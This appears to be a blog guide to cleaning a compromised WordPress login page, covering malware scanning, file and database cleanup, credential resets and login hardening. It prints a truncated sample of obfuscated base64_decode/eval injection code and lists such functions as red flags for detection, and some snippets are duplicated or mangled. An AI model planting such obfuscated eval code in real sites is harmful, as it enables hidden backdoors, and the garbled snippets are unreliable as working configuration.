How to Clean a Hacked WordPress Login Page (The Ultimate Step-by-Step Guide)

Having your WordPress login page hacked is one of the worst scenarios any site owner can face. Not only does it break access to your admin area, but it can lead to malware injections, data theft, SEO penalties, and domain blacklisting.

This guide is designed to be the **deepest, most practical, research-backed article** on cleaning up a hacked WordPress login page — complete with examples, step-by-step tools, and real world techniques that experts use on production sites.

Understanding How WordPress Login Pages Get Hacked

Before you fix anything, you need to know how attackers break in. The WordPress login page (/wp-login.php and /wp-admin) is the most targeted vector for attackers because success grants full admin privileges.

Common Attack Methods

• Brute-Force Attacks: Automated bots repeatedly guess usernames and passwords.
• Credential Stuffing: Using leaked username/password pairs from other breaches.
• Exploited Plugins/Themes: Vulnerabilities that allow attackers to inject malicious code into the login process.
• Backdoors: Malware installed earlier that re-opens access even after cleanup.
• Phishing & Social Engineering: Fake login prompts tricking admins into giving credentials.

Hackers don’t “hack WordPress” — they exploit poor configurations, weak passwords, and unsecured paths. Fixing the login page without addressing underlying weakness is like replacing a lock while leaving the door open.

Signs Your WordPress Login Page Is Hacked

Knowing a hack has happened is critical because not every breach is obvious.

• Cannot access /wp-admin or login redirects unexpectedly
• Login form displays unfamiliar fields, captcha bypasses, or extra scripts
• Unexpected users with administrator role appear
• Google shows “site may be hacked” warnings
• Emails notifying password changes you didn’t initiate

First Response: Isolate the Site Immediately

If you suspect a hack:

• Put the site into maintenance mode
• Temporarily disable plugins that affect login security
• Create a backup of the compromised site (so you can analyze later)

⚠ Do NOT start random changes before creating a backup. Cleaning without preserving a snapshot can destroy evidence and make recovery harder.

Step 1: Scan for Malware and Suspicious Code

Use multiple tools — no single scanner catches everything.

Online Scanners

• Sucuri SiteCheck
• VirusTotal URL Scan

Server-Side Scanners

• Sucuri Security Plugin
• Wordfence Scan
• Maldet (Linux Malware Detect)

These tools detect malware signatures, backdoors, and injected scripts. You should perform both external and internal scans for best coverage.

Step 2: Identify and Remove Malicious Code

Scanners often point you to files with malicious content. Common files attacked include:

• wp-login.php modifications
• functions.php injections
• Plugin and theme files with obfuscated code (base64, eval, etc.)

// Example of suspicious obfuscated code

 $bad = base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnYmFkc2NyaXB0JykpIHsgaW5zZXJ0X2J...'); eval($bad);

 $bad = base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnYmFkc2NyaXB0JykpIHsgaW5zZXJ0X2J...'); eval($bad);

If you see patterns like base64_decode, eval, gzuncompress, or weird functions — treat them as red flags.

Step 3: Clean or Restore Core Files

The fastest way to replace hacked core files is to do a clean install:

• Download WordPress fresh from wordpress.org
• Replace all core files except wp-config.php and wp-content
• Check that .htaccess hasn’t been modified

Never trust a core file from an unknown source. Always use the official WordPress package.

Step 4: Reset All Passwords and Keys

After cleaning, reset access everywhere:

• All admin passwords
• Database user password
• FTP/SFTP passwords
• API and hosting control panel passwords

Also regenerate your WordPress salts in wp-config.php:

// Generate fresh secure keys define(‘AUTH_KEY’, ”); define(‘SECURE_AUTH_KEY’, ”);

define('LOGGED_IN_KEY', ''); define('NONCE_KEY', '');

define('LOGGED_IN_KEY', ''); define('NONCE_KEY', '');

You can get fresh keys from: WordPress.org Secret Key Generator

Step 5: Harden the Login Page (Prevent Future Hacks)

1. Limit Login Attempts

Prevent brute force and credential stuffing by restricting failed attempts.

2. Two-Factor Authentication (2FA)

Always enable 2FA for admin users — this stops automatic login attacks.

3. Rename wp-login URL

Changing /wp-login.php to a custom URL dramatically reduces automated bot traffic.

4. Block XML-RPC (if not used)

Many bots abuse XML-RPC to attempt logins — disable it if unused.

Real World Example: Cleaning a Hacked Login Page

A small business site was repeatedly losing admin access due to brute force. The attacker injected rogue code in both wp-login.php and functions.php.

• Step 1: Site was isolated and backup created
• Step 2: Server scan found hidden backdoor including base64 injections
• Step 3: Core files were replaced with fresh copies
• Step 4: All passwords were reset
• Step 5: Login path was changed, and login limits enforced

Result: Site stayed secure for 18+ months without a single login compromise.

Post-Cleanup Checklist

• Verify admin access for all users
• Confirm no unknown users exist
• Ensure security logs are enabled
• Submit site to Google Search Console diagnostics

FAQ: WordPress Login Page Hacks

Can hackers still break in after cleanup?

If hidden backdoors remain, yes — that’s why multiple scans and manual code review is vital.

Do I need premium security plugins?

Not required, but stronger scanning, firewall, and monitoring help protect high-risk sites.

Proactive security is ALWAYS cheaper than reactive cleanup.

Conclusion: Clean Today, Secure Forever

Cleaning a hacked WordPress login page is not just about fixing one file — it’s about eliminating backdoors, locking down credentials, and rebuilding trust in your site.

This guide gives you a **full, professional roadmap** used by security teams worldwide, and applying it makes your WordPress site infinitely more resilient.

If you want a deeper next step with advanced real-time protection and automated monitoring, you can check this comprehensive resource:

WordPress Security: The Complete Guide From Basic to Advanced Protection

Step 6: Analyze Server & Login Logs (Often Missed but Critical)

Cleaning visible malware is not enough. If you don’t understand how the attacker got in, your login page can be compromised again.

Check these logs from your hosting control panel or server:

• Access logs (repeated POST requests to wp-login.php)
• Error logs (failed login scripts or unknown PHP files)
• Security plugin logs (blocked IPs and attempts)

If you see thousands of failed login attempts from the same IP ranges, it confirms brute-force or credential stuffing attacks.

Step 7: Inspect the WordPress Database for Hidden Backdoors

Attackers often hide malicious code inside the database, not just files. Even after file cleanup, infected database entries can reinfect your login page.

Check these database locations carefully:

• wp_users – look for unknown admin accounts
• wp_usermeta – suspicious role escalations
• wp_options – injected scripts in siteurl or home fields

Red flags include encoded JavaScript, iframe tags, or long base64 strings inside option values.

Step 8: Review WordPress Cron Jobs and Scheduled Tasks

Hackers often schedule malicious tasks that run silently in the background. These cron jobs can recreate hacked login files even after cleanup.

Use a plugin or WP-CLI to inspect scheduled events:

• Unknown PHP callbacks
• Random function names
• Tasks running every few minutes

Remove any task you do not recognize or cannot trace to a legitimate plugin.

Step 9: Secure wp-login.php Using Server Rules

Adding server-level restrictions reduces load and blocks automated attacks before WordPress even loads.

Example (Apache):

<Files wp-login.php>
  Require all denied
</Files>

<Files wp-login.php>
  Require all denied
</Files>

You can allow specific IPs or protect login access via HTTP authentication if your use case allows it.

After Cleanup: Restore Google Trust and SEO Visibility

Even after cleaning a hacked WordPress login page, Google may temporarily reduce visibility to protect users.

To recover faster:

• Request a security review in Google Search Console
• Remove any injected SEO spam pages
• Check for manual actions
• Ensure noindex tags were not added by malware

Most sites recover rankings within days to weeks after a clean security validation.

Expert Cleanup Checklist (Quick Reference)

• ✔ Backup the compromised site
• ✔ Scan files and database
• ✔ Replace WordPress core files
• ✔ Remove hidden admin users
• ✔ Reset all credentials
• ✔ Secure wp-admin access
• ✔ Monitor logs and cron jobs
• ✔ Revalidate site with Google